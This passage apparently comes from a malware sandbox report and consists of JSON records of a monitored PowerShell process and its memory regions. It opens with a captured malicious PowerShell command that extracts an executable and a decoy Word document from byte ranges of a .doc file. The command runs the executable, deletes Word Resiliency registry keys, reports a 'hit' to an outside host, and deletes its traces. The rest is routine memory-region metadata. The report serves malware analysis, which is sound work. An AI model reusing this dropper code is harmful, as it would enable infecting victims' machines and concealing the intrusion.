$r.IndexOf('.doc')+4);ri -Path \"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\"\"\" -recurse;cp -Path $r -Destination $tmf;$d = (gc $tmf -ReadCount 0 -encoding 
byte)[985480..1011591];Start-Sleep -s 1;sc $r -encoding byte -Value $d;start winword \"\"\"$r\"\"\";$f = (gc $tmf -ReadCount 0 -encoding byte)[420737..985472];sc $ada -encoding byte -Value $f;& $ada;$wc = New-Object system.Net.WebClient;$ht=$wc.downloadString('http://www.samyrai777m.p-host.in/t/t.php?act=hit');$cd=(Resolve-Path .\\).Path;ri \"\"\"$cd\\*\"\"\" -include http*.pdb, http*.dll, *.cs;}Catch{}};$wv='12.0';pr;$wv='14.0';pr;$wv='15.0';pr;$wv='16.0';pr;Stop-Process -processname powershell;}Catch{exit;}", "filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "id": "proc_10", "image_name": "powershell.exe", "monitor_reason": "child_process", "monitored_id": 10, "origin_monitor_id": 7, "ref_parent_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000010-region_00001463-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_238", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1463", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:08.196", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_1464", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": 
"pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:08.196", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_1465", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:01:08.196", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001466-addr_0x0000000000050000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_239", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 851967, "entry_point": 0, "filename": null, "id": "region_1466", "name": "private_0x0000000000050000", "norm_filename": null, "region_type": "private_memory", "start_va": 327680, "timestamp": "00:01:08.196", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2004877312, "type": "region", "version": 1 }, "end_va": 2006618111, "entry_point": 2004877312, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1467", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2004877312, "timestamp": "00:01:08.196", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No 
dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1468", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:08.197", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001469-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_240", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_1469", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:08.197", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 487424, "start_va": 5358419968, "type": "region", "version": 1 }, "end_va": 5358907391, "entry_point": 5358470716, "filename": "\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "id": "region_1470", "name": "powershell.exe", "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "region_type": "memory_mapped_file", "start_va": 5358419968, "timestamp": "00:01:08.197", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], 
"ref_process_dump": null, "size": 4096, "start_va": 8791792943104, "type": "region", "version": 1 }, "end_va": 8791792947199, "entry_point": 8791792943104, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1471", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 8791792943104, "timestamp": "00:01:08.198", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 8796092694528, "type": "region", "version": 1 }, "end_va": 8796092837887, "entry_point": 0, "filename": null, "id": "region_1472", "name": "pagefile_0x000007fffffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8796092694528, "timestamp": "00:01:08.201", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001473-addr_0x000007fffffdd000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_241", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092878848, "type": "region", "version": 1 }, "end_va": 8796092887039, "entry_point": 0, "filename": null, "id": "region_1473", "name": "private_0x000007fffffdd000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092878848, "timestamp": "00:01:08.201", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001474-addr_0x000007fffffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_242", "ref_source": "summary", 
"ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 8796092887040, "type": "region", "version": 1 }, "end_va": 8796092891135, "entry_point": 0, "filename": null, "id": "region_1474", "name": "private_0x000007fffffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092887040, "timestamp": "00:01:08.205", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1527", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:08.626", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1528", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:08.626", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 1273855, "entry_point": 851968, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1529", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": 
"memory_mapped_file", "start_va": 851968, "timestamp": "00:01:08.626", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1339391, "entry_point": 0, "filename": null, "id": "region_1530", "name": "pagefile_0x0000000000140000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1310720, "timestamp": "00:01:08.627", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1384447, "entry_point": 0, "filename": null, "id": "region_1531", "name": "pagefile_0x0000000000150000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1376256, "timestamp": "00:01:08.627", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001532-addr_0x0000000000160000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_250", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1507327, "entry_point": 0, "filename": null, "id": "region_1532", "name": "private_0x0000000000160000", "norm_filename": null, "region_type": "private_memory", "start_va": 1441792, "timestamp": "00:01:08.627", "type": "region", "version": 1 }, { "dump": { "filename": 
"process_00000010-region_00001533-addr_0x0000000000170000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_251", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 2555903, "entry_point": 0, "filename": null, "id": "region_1533", "name": "private_0x0000000000170000", "norm_filename": null, "region_type": "private_memory", "start_va": 1507328, "timestamp": "00:01:08.627", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2555904, "type": "region", "version": 1 }, "end_va": 2568191, "entry_point": 2555904, "filename": "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui", "id": "region_1534", "name": "powershell.exe.mui", "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui", "region_type": "memory_mapped_file", "start_va": 2555904, "timestamp": "00:01:08.627", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001535-addr_0x0000000000280000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_252", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2621440, "type": "region", "version": 1 }, "end_va": 2625535, "entry_point": 0, "filename": null, "id": "region_1535", "name": "private_0x0000000000280000", "norm_filename": null, "region_type": "private_memory", "start_va": 2621440, "timestamp": "00:01:08.628", "type": "region", "version": 1 }, { "dump": { 
"filename": "process_00000010-region_00001536-addr_0x0000000000290000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_253", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 2686976, "type": "region", "version": 1 }, "end_va": 3735551, "entry_point": 0, "filename": null, "id": "region_1536", "name": "private_0x0000000000290000", "norm_filename": null, "region_type": "private_memory", "start_va": 2686976, "timestamp": "00:01:08.628", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 3735552, "type": "region", "version": 1 }, "end_va": 5341183, "entry_point": 0, "filename": null, "id": "region_1537", "name": "pagefile_0x0000000000390000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3735552, "timestamp": "00:01:08.628", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 5373952, "type": "region", "version": 1 }, "end_va": 6950911, "entry_point": 0, "filename": null, "id": "region_1538", "name": "pagefile_0x0000000000520000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5373952, "timestamp": "00:01:08.628", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], 
"ref_process_dump": null, "size": 20971520, "start_va": 7012352, "type": "region", "version": 1 }, "end_va": 27983871, "entry_point": 0, "filename": null, "id": "region_1539", "name": "pagefile_0x00000000006b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7012352, "timestamp": "00:01:08.629", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001540-addr_0x0000000001ab0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_254", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 27983872, "type": "region", "version": 1 }, "end_va": 27987967, "entry_point": 0, "filename": null, "id": "region_1540", "name": "private_0x0000000001ab0000", "norm_filename": null, "region_type": "private_memory", "start_va": 27983872, "timestamp": "00:01:08.629", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2002649088, "type": "region", "version": 1 }, "end_va": 2003673087, "entry_point": 2002756296, "filename": "\\Windows\\System32\\user32.dll", "id": "region_1541", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 2002649088, "timestamp": "00:01:08.629", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2003697664, "type": "region", "version": 1 }, "end_va": 2004873215, "entry_point": 2003787424, "filename": 
"\\Windows\\System32\\kernel32.dll", "id": "region_1542", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 2003697664, "timestamp": "00:01:08.630", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_1543", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:08.631", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1544", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:08.631", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 454656, "start_va": 8791555899392, "type": "region", "version": 1 }, "end_va": 8791556354047, "entry_point": 8791555903796, "filename": "\\Windows\\System32\\mscoree.dll", "id": "region_1545", "name": "mscoree.dll", "norm_filename": "c:\\windows\\system32\\mscoree.dll", "region_type": "memory_mapped_file", "start_va": 8791555899392, "timestamp": "00:01:08.631", "type": "region", 
"version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 8791729963008, "type": "region", "version": 1 }, "end_va": 8791730065407, "entry_point": 8791729967528, "filename": "\\Windows\\System32\\atl.dll", "id": "region_1546", "name": "atl.dll", "norm_filename": "c:\\windows\\system32\\atl.dll", "region_type": "memory_mapped_file", "start_va": 8791729963008, "timestamp": "00:01:08.631", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 438272, "start_va": 8791758012416, "type": "region", "version": 1 }, "end_va": 8791758450687, "entry_point": 8791758024928, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_1547", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 8791758012416, "timestamp": "00:01:08.632", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 188416, "start_va": 8791759519744, "type": "region", "version": 1 }, "end_va": 8791759708159, "entry_point": 8791759523856, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_1548", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 8791759519744, "timestamp": "00:01:08.633", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", 
"executable" ], "ref_process_dump": null, "size": 651264, "start_va": 8791761682432, "type": "region", "version": 1 }, "end_va": 8791762333695, "entry_point": 8791761692064, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_1549", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 8791761682432, "timestamp": "00:01:08.633", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 880640, "start_va": 8791762862080, "type": "region", "version": 1 }, "end_va": 8791763742719, "entry_point": 8791762874996, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_1550", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 8791762862080, "timestamp": "00:01:08.634", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 8791763779584, "type": "region", "version": 1 }, "end_va": 8791763836927, "entry_point": 8791763783808, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_1551", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 8791763779584, "timestamp": "00:01:08.634", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2109440, "start_va": 8791766335488, "type": "region", "version": 1 }, "end_va": 8791768444927, "entry_point": 8791766479664, "filename": 
"\\Windows\\System32\\ole32.dll", "id": "region_1552", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 8791766335488, "timestamp": "00:01:08.635", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1232896, "start_va": 8791771054080, "type": "region", "version": 1 }, "end_va": 8791772286975, "entry_point": 8791771376976, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_1553", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 8791771054080, "timestamp": "00:01:08.635", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 462848, "start_va": 8791772299264, "type": "region", "version": 1 }, "end_va": 8791772762111, "entry_point": 8791772372512, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_1554", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 8791772299264, "timestamp": "00:01:08.636", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1085440, "start_va": 8791788683264, "type": "region", "version": 1 }, "end_va": 8791789768703, "entry_point": 8791788687460, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_1555", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 
8791788683264, "timestamp": "00:01:08.636", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 8791790452736, "type": "region", "version": 1 }, "end_va": 8791790579711, "entry_point": 8791790477544, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_1556", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 8791790452736, "timestamp": "00:01:08.637", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 897024, "start_va": 8791790583808, "type": "region", "version": 1 }, "end_va": 8791791480831, "entry_point": 8791790716768, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_1557", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 8791790583808, "timestamp": "00:01:08.637", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 421888, "start_va": 8791791566848, "type": "region", "version": 1 }, "end_va": 8791791988735, "entry_point": 8791791611964, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_1558", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 8791791566848, "timestamp": "00:01:08.638", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region 
is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 8791792025600, "type": "region", "version": 1 }, "end_va": 8791792848895, "entry_point": 8791792527476, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_1559", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 8791792025600, "timestamp": "00:01:08.638", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001565-addr_0x0000000001ac0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_255", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 28049408, "type": "region", "version": 1 }, "end_va": 29097983, "entry_point": 0, "filename": null, "id": "region_1565", "name": "private_0x0000000001ac0000", "norm_filename": null, "region_type": "private_memory", "start_va": 28049408, "timestamp": "00:01:08.670", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001566-addr_0x0000000001c30000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_256", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 29556736, "type": "region", "version": 1 }, "end_va": 29622271, "entry_point": 0, "filename": null, "id": "region_1566", "name": "private_0x0000000001c30000", "norm_filename": null, "region_type": "private_memory", "start_va": 29556736, "timestamp": "00:01:08.671", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001567-addr_0x0000000001dd0000-size_0x0000000000080000-perm_rwx.bin", "flags": [ "dumped" 
], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_257", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 31260672, "type": "region", "version": 1 }, "end_va": 31784959, "entry_point": 0, "filename": null, "id": "region_1567", "name": "private_0x0000000001dd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 31260672, "timestamp": "00:01:08.671", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791754276864, "type": "region", "version": 1 }, "end_va": 8791754338303, "entry_point": 8791754280976, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_1568", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 8791754276864, "timestamp": "00:01:08.671", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 29097984, "type": "region", "version": 1 }, "end_va": 29102079, "entry_point": 0, "filename": null, "id": "region_1637", "name": "pagefile_0x0000000001bc0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 29097984, "timestamp": "00:01:09.220", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 29163520, "type": 
"region", "version": 1 }, "end_va": 29167615, "entry_point": 0, "filename": null, "id": "region_1638", "name": "pagefile_0x0000000001bd0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 29163520, "timestamp": "00:01:09.220", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 29229056, "type": "region", "version": 1 }, "end_va": 29237247, "entry_point": 0, "filename": null, "id": "region_1639", "name": "pagefile_0x0000000001be0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 29229056, "timestamp": "00:01:09.220", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 29294592, "type": "region", "version": 1 }, "end_va": 29298687, "entry_point": 0, "filename": null, "id": "region_1640", "name": "pagefile_0x0000000001bf0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 29294592, "timestamp": "00:01:09.220", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 29360128, "type": "region", "version": 1 }, "end_va": 29368319, "entry_point": 0, "filename": null, "id": "region_1641", "name": "pagefile_0x0000000001c00000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 29360128, "timestamp": "00:01:09.220", "type": "region", "version": 1 }, { "dump": { 
